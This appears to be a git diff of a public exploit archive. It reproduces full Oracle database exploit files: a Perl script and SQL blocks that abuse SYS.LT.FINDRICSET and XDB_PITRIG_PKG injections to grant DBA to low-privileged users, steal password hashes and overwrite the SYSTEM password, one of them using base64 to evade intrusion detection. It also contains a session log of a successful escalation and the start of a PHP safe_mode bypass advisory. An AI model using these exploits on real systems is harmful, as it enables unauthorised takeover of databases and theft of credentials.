Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go...\n"; +my $sth = $dbh->prepare( qq{ +BEGIN + SYS.LT.FINDRICSET('.''||$user.own||'''')--','x'); +END;}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4571.pl b/platforms/multiple/local/4571.pl index 1bae9d9ff..294fb7b08 100755 --- a/platforms/multiple/local/4571.pl +++ b/platforms/multiple/local/4571.pl @@ -1,127 +1,127 @@ -#!/usr/bin/perl -# -# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl -# -# Oracle SYS.LT.FINDRICSET exploit (11g/10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privilege needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" -# -# Fixed with CPU Oct. 2007 -# -# REF: Thanks to Joxean Koret and his excellent Inguma -# http://sourceforge.net/projects/inguma -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricsetV2.pl line 69. -# [-] Done! -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 1 -# [-] Go... -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go...\n"; -$sth = $dbh->prepare(qq{ -BEGIN - SYS.LT.FINDRICSET('.''||dbms_sql.execute($cursor)||'''')--','x'); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-10-27] +#!/usr/bin/perl +# +# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl +# +# Oracle SYS.LT.FINDRICSET exploit (11g/10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privilege needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" +# +# Fixed with CPU Oct. 2007 +# +# REF: Thanks to Joxean Koret and his excellent Inguma +# http://sourceforge.net/projects/inguma +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricsetV2.pl line 69. +# [-] Done! +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 1 +# [-] Go... +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl sys-lt-findricsetV2.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go...\n"; +$sth = $dbh->prepare(qq{ +BEGIN + SYS.LT.FINDRICSET('.''||dbms_sql.execute($cursor)||'''')--','x'); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4572.txt b/platforms/multiple/local/4572.txt index d20421ea4..35fc37331 100755 --- a/platforms/multiple/local/4572.txt +++ b/platforms/multiple/local/4572.txt @@ -1,50 +1,50 @@ -/******************************************************************/ -/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/ -/******************************************************************/ -/*********** sploit grant DBA to scott **************/ -/*********** evil cursor injection **************/ -/*********** No "create procedure" privileg needed! **************/ -/*********** + Funny IDS evasion vith base64 **************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: October 26, 2007 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* David Litchfield [ davidl@ngssoftware.com ] */ -/* Reported: 22nd August 2006 */ -/* Date of Public Advisory: October 17, 2007 */ -/* Advisory number: #NISR17102007B */ -/* */ -/******************************************************************/ -/* P.S. Special thanks David Litchfield for all his work **/ -/******************************************************************/ - - -/* you may need some tweaks to make it work with other users except skott :) */ - - -select * from user_role_privs; - - -DECLARE -c2gya2Vy NUMBER; -BEGIN - c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV - -Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); - SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF'); -END; - - -select * from user_role_privs; - ------------------------------LOG--------------------------------------------- --- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- -- - -// milw0rm.com [2007-10-27] +/******************************************************************/ +/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/ +/******************************************************************/ +/*********** sploit grant DBA to scott **************/ +/*********** evil cursor injection **************/ +/*********** No "create procedure" privileg needed! **************/ +/*********** + Funny IDS evasion vith base64 **************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: October 26, 2007 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* David Litchfield [ davidl@ngssoftware.com ] */ +/* Reported: 22nd August 2006 */ +/* Date of Public Advisory: October 17, 2007 */ +/* Advisory number: #NISR17102007B */ +/* */ +/******************************************************************/ +/* P.S. Special thanks David Litchfield for all his work **/ +/******************************************************************/ + + +/* you may need some tweaks to make it work with other users except skott :) */ + + +select * from user_role_privs; + + +DECLARE +c2gya2Vy NUMBER; +BEGIN + c2gya2Vy := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV + +Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); + SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF'); +END; + + +select * from user_role_privs; + +-----------------------------LOG--------------------------------------------- +-- -- --SQL*Plus: Release 10.1.0.2.0 - Production on Fri Oct 26 16:51:39 2007 -- --Copyright (c) 1982, 2004, Oracle. All rights reserved. -- -- --Connected to: --Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production --With the Partitioning, OLAP and Data Mining options -- -- -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> DECLARE -- 2 c2gya2Vy NUMBER; -- 3 BEGIN -- 4 c2gya2Vy := DBMS_SQL.OPEN_CURSOR; -- 5 DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25 --vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09 --UVCc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0); --6 SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql. --execute('||c2gya2Vy||')||''','DEADBEAF'); --7 END; --8 / --TGV2ZWWGMSBJB21SZXRLIDOP.U2VLLNUUBGF0ZXIP1 -- --PL/SQL procedure successfully completed. -- --SQL> select * from user_role_privs; -- --USERNAME GRANTED_ROLE ADM DEF OS_ -------------------------------- ------------------------------ --- --- --- --SCOTT CONNECT NO YES NO --SCOTT DBA NO YES NO --SCOTT RESOURCE NO YES NO -- --SQL> -- -- -- + +// milw0rm.com [2007-10-27] diff --git a/platforms/multiple/local/4994.sql b/platforms/multiple/local/4994.sql index 8ebed93b7..53681a3b3 100755 --- a/platforms/multiple/local/4994.sql +++ b/platforms/multiple/local/4994.sql @@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ -/******* SQL Injection Exploit **********/ -/******************************************************************/ -/************ sploit get password Hashes ***************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - -CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); - -CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; -COMMIT; -RETURN ''; -END; -/ - - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); - -select * from sh2kerr; - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ +/******* SQL Injection Exploit **********/ +/******************************************************************/ +/************ sploit get password Hashes ***************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + +CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); + +CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; +COMMIT; +RETURN ''; +END; +/ + + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); + +select * from sh2kerr; + + + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/local/4995.sql b/platforms/multiple/local/4995.sql index e08289b93..a7847e86a 100755 --- a/platforms/multiple/local/4995.sql +++ b/platforms/multiple/local/4995.sql @@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ -/******* SQL Injection Exploit *********/ -/******************************************************************/ -/************ sploit get password Hashes ***************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - -CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); - -CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; -COMMIT; -RETURN ''; -END; -/ - - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); - -select * from sh2kerr; - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ +/******* SQL Injection Exploit *********/ +/******************************************************************/ +/************ sploit get password Hashes ***************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + +CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); + +CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; +COMMIT; +RETURN ''; +END; +/ + + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); + +select * from sh2kerr; + + + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/local/4996.sql b/platforms/multiple/local/4996.sql index a22b386b8..b8d0d8ec7 100755 --- a/platforms/multiple/local/4996.sql +++ b/platforms/multiple/local/4996.sql @@ -1,51 +1,51 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ -/******* SQL Injection Exploit **********/ -/******************************************************************/ -/************ exploit change system password **************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 25, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ - - - -/* set password 12345 to user SYSTEM */ - -CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM'''; -COMMIT; -RETURN ''; -END; -/ - -EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); - - - - - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/ +/******* SQL Injection Exploit **********/ +/******************************************************************/ +/************ exploit change system password **************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 25, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ + + + +/* set password 12345 to user SYSTEM */ + +CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM'''; +COMMIT; +RETURN ''; +END; +/ + +EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); + + + + + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/local/629.c b/platforms/multiple/local/629.c index 5c4fcbeb3..48a5d1ea1 100755 --- a/platforms/multiple/local/629.c +++ b/platforms/multiple/local/629.c @@ -116,6 +116,6 @@ return 0; scan_file(argv[1]); return 0; -} - -// milw0rm.com [2004-11-14] +} + +// milw0rm.com [2004-11-14] diff --git a/platforms/multiple/local/7171.txt b/platforms/multiple/local/7171.txt index 11409ee0d..cd90f2fe6 100755 --- a/platforms/multiple/local/7171.txt +++ b/platforms/multiple/local/7171.txt @@ -1,93 +1,93 @@ -[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] - -Author: Maksymilian Arciemowicz (cXIb8O3) -securityreason.com -Date: -- - Written: 10.11.2008 -- - Public: 20.11.2008 - -SecurityReason Research -SecurityAlert Id: 57 - -CWE: CWE-264 -SecurityRisk: Medium - -Affected Software: PHP 5.2.6 -Advisory URL: http://securityreason.com/achievement_securityalert/57 -Vendor: http://www.php.net - -- --- 0.Description --- -PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl -with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web -developers to write dynamically generated pages quickly. - -error_log - -They allow you to define your own error handling rules, as well as modify the way the errors can -be logged. This allows you to change and enhance error reporting to suit your needs. - -- --- 0. error_log const. bypassed by php_admin_flag --- -The main problem is between using safe_mode in global mode - -php.ini­: -safe_mode = On - -and declaring via php_admin_flag - - -... - php_admin_flag safe_mode On - - -When we create some php script in /www/ and try call to: - -ini_set("error_log", "/hack/"); - -or in /www/.htaccess - -php_value error_log "/hack/bleh.php" - - -Result: - -Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 - -Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 - - -It was for safe_mode declared in php.ini. But if we use - -php_admin_flag safe_mode On - -in httpd.conf, we will get only - -Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 - -syntax in .htaccess - -php_value error_log "/hack/blehx.php" - -is allowed and bypass safe_mode. - -example exploit: -error_log("", 0); - -- --- 2. How to fix --- -Fixed in CVS - -http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup - -Note: -Do not use safe_mode as a main safety. - - --- 3. Greets --- -sp3x Infospec schain p_e_a pi3 - -- --- 4. Contact --- -Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] -Email: cxib [at] securityreason [dot] com -GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg -http://securityreason.com -http://securityreason.pl - -# milw0rm.com [2008-11-20] +[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] + +Author: Maksymilian Arciemowicz (cXIb8O3) +securityreason.com +Date: +- - Written: 10.11.2008 +- - Public: 20.11.2008 + +SecurityReason Research +SecurityAlert Id: 57 + +CWE: CWE-264 +SecurityRisk: Medium + +Affected Software: PHP 5.2.6 +Advisory URL: http://securityreason.com/achievement_securityalert/57 +Vendor: http://www.php.net + +- --- 0.Description --- 